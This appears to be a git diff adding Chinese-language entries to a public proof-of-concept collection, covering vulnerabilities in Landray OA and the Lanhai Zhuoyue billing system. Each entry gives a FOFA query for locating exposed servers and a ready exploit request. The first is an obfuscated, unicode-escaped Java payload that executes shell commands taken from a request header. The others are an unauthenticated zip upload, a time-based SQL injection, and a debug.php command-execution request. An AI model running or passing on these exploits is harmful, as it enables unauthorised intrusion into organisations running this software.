@@ -0,0 +1,25 @@ +## 蓝凌OA treexml.tmpl 远程命令执行漏洞 + +## fofa +``` +app="Landray-OA系统" +``` + +## exp +``` +POST /data/sys-common/treexml.tmpl HTTP/1.1 +Host: +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +RunGo: dir +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Content-Length: 0 + +s_bean=ruleFormulaValidate&script=\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u
0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u00
67\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022
\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u
0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0052\u0075\u006e\u0047\u006f\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u00
20\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061
\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u
0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u00
20\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d +``` +## 
漏洞复现 +执行POC,执行dir命令,回显目录 +![](./assets/20231026210940.png) diff --git a/蓝凌OAsysUiComponent-文件存在任意文件上传漏洞.md b/蓝凌OAsysUiComponent-文件存在任意文件上传漏洞.md new file mode 100644 index 0000000..f5f370f --- /dev/null +++ b/蓝凌OAsysUiComponent-文件存在任意文件上传漏洞.md @@ -0,0 +1,57 @@ +## 蓝凌OAsysUiComponent 文件存在任意文件上传漏洞 + +## fofa +``` +app="Landray-OA系统" + +``` + + +## poc +直接访问路径,发现未授权文件上传 http://.com/sys/ui/sys_ui_component/sysUiComponent.do?method=upload +![c9857f5370d4abd1547fa7cb1988a18a](https://github.com/wy876/POC/assets/139549762/ee361dae-cfa2-4eae-910f-501331731347) + +``` +POST /sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true HTTP/1.1 +Host: IP:PORT +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Referer: http://.com/sys/ui/sys_ui_component/sysUiComponent.do?method=upload +Content-Length: 474 +Content-Type: multipart/form-data; boundary=---------------------------15610248407689 +Cookie: SESSION=YmI0OGMyZDQtZDE0NC00MTQ2LWJmMzMtNWE5NDMwOTYxM2Ex +DNT: 1 +Connection: close + +-----------------------------15610248407689 +Content-Disposition: form-data; name="file"; filename="test.zip" +Content-Type: application/x-zip-compressed + +PKx3;x4;x14; +-----------------------------15610248407689 +``` +## 漏洞复现 +创建component.ini文件,内容为: +``` +id=2023 +name=check.txt +``` +创建上传check.txt文件 +``` +1111 +``` +然后使用压缩软件,将两个文件压缩成一个压缩包,文件名check.zip + + +最后上传即可。上传成功后访问路径/resource/ui-component/2023/check.txt + + +## 漏洞来源 +``` +https://mp.weixin.qq.com/s/xhwmFuItG8ZoiuGrwR5bnw +``` + + diff --git a/蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞.md b/蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞.md new file mode 100644 index 0000000..3bf58aa --- /dev/null +++ b/蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞.md 
@@ -0,0 +1,30 @@ +# 蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞 + +# 一、漏洞简介 +蓝海卓越计费管理系统agent_setstat存在SQL注入漏洞 + +# 二、影响版本 ++ 蓝海卓越 计费管理系统 + +# 三、资产测绘 ++ fofa`title=="蓝海卓越计费管理系统"` ++ 特征 + +![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/ILj6pxbgPBiUNxBM/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-994839.png) + +# 四、漏洞复现 +```plain +GET /agent_setstate.php?id=1+AND+(SELECT+4964+FROM+(SELECT(if(length(database())=6,sleep(3),1)))uQqn) HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 +Content-Length: 161 +``` + +![1716367639326-aee08e08-c3d0-4b5d-ac2d-e77844bafdce.png](./img/ILj6pxbgPBiUNxBM/1716367639326-aee08e08-c3d0-4b5d-ac2d-e77844bafdce-351977.png) + + + + + +> 更新: 2024-05-23 12:33:24 +> 原文: \ No newline at end of file diff --git a/蓝海卓越计费管理系统debug存在远程命令执行漏洞.md b/蓝海卓越计费管理系统debug存在远程命令执行漏洞.md new file mode 100644 index 0000000..c449c0e --- /dev/null +++ b/蓝海卓越计费管理系统debug存在远程命令执行漏洞.md @@ -0,0 +1,38 @@ +# 蓝海卓越 计费管理系统debug存在远程命令执行漏洞 + +# 一、漏洞简介 +蓝海卓越 计费管理系debug存在远程命令执行漏洞,导致攻击者可以远程命令执行 + +# 二、影响版本 ++ 蓝海卓越 计费管理系统 + +# 三、资产测绘 ++ fofa`title=="蓝海卓越计费管理系统"` ++ 特征 + +![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/v8vbMQIfX0kONNUn/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-099589.png) + +# 四、漏洞复现 +```plain +POST /debug.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 6 +Connection: close +Cookie: PHPSESSID=6jvq6prlaoemtc00r7a876ntb4 +Priority: u=1 + +cmd=id +``` + +![1716136252700-9872c760-028e-41b3-b57e-53c461873e34.png](./img/v8vbMQIfX0kONNUn/1716136252700-9872c760-028e-41b3-b57e-53c461873e34-607611.png) + + + +> 更新: 2024-05-23 12:33:24 +> 原文: \ No newline at end of file 
